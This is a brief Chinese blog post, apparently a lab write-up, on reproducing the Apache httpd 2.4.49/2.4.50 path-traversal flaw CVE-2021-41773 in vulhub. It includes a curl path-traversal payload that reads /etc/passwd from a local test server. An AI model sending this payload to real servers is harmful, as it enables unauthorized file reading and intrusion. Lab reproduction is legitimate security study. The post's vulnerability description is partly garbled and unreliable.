vulhub-CVE-2021-41773

siwei 好物分享

漏洞原理
Apache在2.4.49版本中,引入路径体验,该漏洞仅影响具有“要求全部拒绝”访问权限的 Apache HTTP Server 2.4.49 版控制配置禁用。
漏洞危害
可利用漏洞进行远程RCE,访问web服务器上文档根目录之外的任意文件。泄露CGI。
影响版本
Apache HTTPd 2.4.49/2.4.50版本
环境搭建和测试
切换到vulhub/httpd/CVE-2021-41773,启动环境
docker-compose up -d

浏览器访问ip:8080 使用curl发送payload
curl -v --path-as-is http://127.0.0.1:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

参考文献
shodan新手使用指南 批量

vulhub-CVE-2021-41773最先出现在Python成神之路

版权声明:
作者:siwei
链接:https://www.techfm.club/p/15149.html
来源:TechFM
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
< <上一篇
下一篇>>